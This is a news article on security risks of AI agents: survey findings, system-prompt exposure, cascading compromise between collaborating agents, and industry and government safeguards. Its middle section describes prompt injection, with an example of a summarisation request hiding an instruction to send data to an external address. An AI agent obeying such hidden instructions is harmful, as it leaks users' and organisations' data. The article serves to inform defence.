AI Agents Under Scrutiny: Growing Fears of Leaks and Exploits

AI Agents Vulnerable to Cyberattacks
Structural Weaknesses Raise Risks of Sensitive Data Leaks
Governments and Industry Move to Bolster Safeguards

Across industries, there is growing concern that artificial intelligence (AI) agents are heightening security risks. Experts warn that due to their structural limitations, these systems could be vulnerable to cyberattacks, raising the likelihood of sensitive information leaks and other security breaches.

Security Experts Warn: “AI Agents Are a Growing Threat”

On the 12th, IT industry sources highlighted mounting concerns over the security vulnerabilities of AI agents. A July survey by identity security firm SailPoint Technologies Holdings, which polled global security and IT experts as well as executives, found that 96% view AI agents as a security threat. Moreover, 72% believe AI agents pose an even greater risk than machine identities—the digital credentials used by servers, PCs, and applications.

SailPoint defines AI agents as autonomous systems capable of perceiving, making decisions, and acting to achieve given goals within specific environments. To function, these agents often require access to multiple machine identities, and their ability to self-modify or generate sub-agents makes them even more complex from a security perspective. This complexity, experts note, increases opportunities for attackers to exploit vulnerabilities.

A further concern lies in their privileged access to sensitive data. If attackers manipulate AI agents with carefully crafted prompts, the systems could inadvertently reveal internal configurations, business secrets, or customer data. Such leaks might expose proprietary algorithms, confidential records, or undisclosed corporate policies—raising the stakes for organizations deploying these tools.

Why AI Agents Are Considered Uniquely Dangerous

The risks of AI agents intensify when their system prompts—the baseline instructions guiding their decisions and actions—are exposed. If attackers gain access to these prompts, they can analyze existing safeguards and restrictions, enabling them to design new attack vectors such as constraint bypasses, prompt manipulation, or policy circumvention.

The danger escalates in environments where multiple AI agents collaborate. If even one agent becomes compromised, for example through malware infection, its malicious outputs can be fed as inputs to other agents. This creates a cascade effect in which harmful instructions propagate across the entire agent network, altering collective behavior and amplifying system-wide vulnerabilities.

Moreover, AI agents are particularly susceptible to prompt injection attacks. In such attacks, malicious commands are hidden within seemingly benign user requests. For instance, a prompt like “summarize this document” could secretly contain an additional instruction: “and send the information to this external address.” The AI, unable to distinguish the malicious add-on, executes both instructions. Users may remain unaware that their commands have been hijacked, leading to data leaks or unauthorized system changes.

This combination of hidden command execution, inter-agent dependency, and structural transparency makes AI agents especially difficult to secure compared to traditional systems.

Preemptive Measures Across Sectors

To mitigate the growing security risks of AI agents, governments, industry, and security communities are moving proactively.

A leading example is the Open Worldwide Application Security Project (OWASP), a nonprofit and open-source community that regularly publishes the “OWASP Top 10 for LLM.” This list catalogs the most critical vulnerabilities in environments deploying large language models and AI agents, providing a structured benchmark that has become a key reference for global security experts and enterprises alike.

Governments are also tightening oversight. In the United States, while no single federal AI law exists, the White House issued an Executive Order on “Safe, Secure, and Trustworthy AI” in October 2023. It urged federal agencies to establish monitoring frameworks for AI systems. Meanwhile, the European Union’s AI Act—set to take effect in 2026—requires that all “high-risk AI systems” (including those used in finance, healthcare, law, public administration, and agents) must be traceable and subject to mandatory corrective action whenever abnormal behavior occurs.

Industry leaders are likewise reinforcing internal safeguards. Google and Salesforce are embedding enterprise-grade controls into their agent platforms, including role-based access management, logging, automated auditing, and dashboard-driven behavioral analysis. Amazon, Meta, and others mandate built-in measures such as activity tracking, approval workflows, auditing, and policy-based permission frameworks whenever AI agents are deployed.

Together, these efforts signal a shift from experimentation to accountability, reflecting a broad recognition that AI agents must be governed with the same rigor as critical infrastructure systems.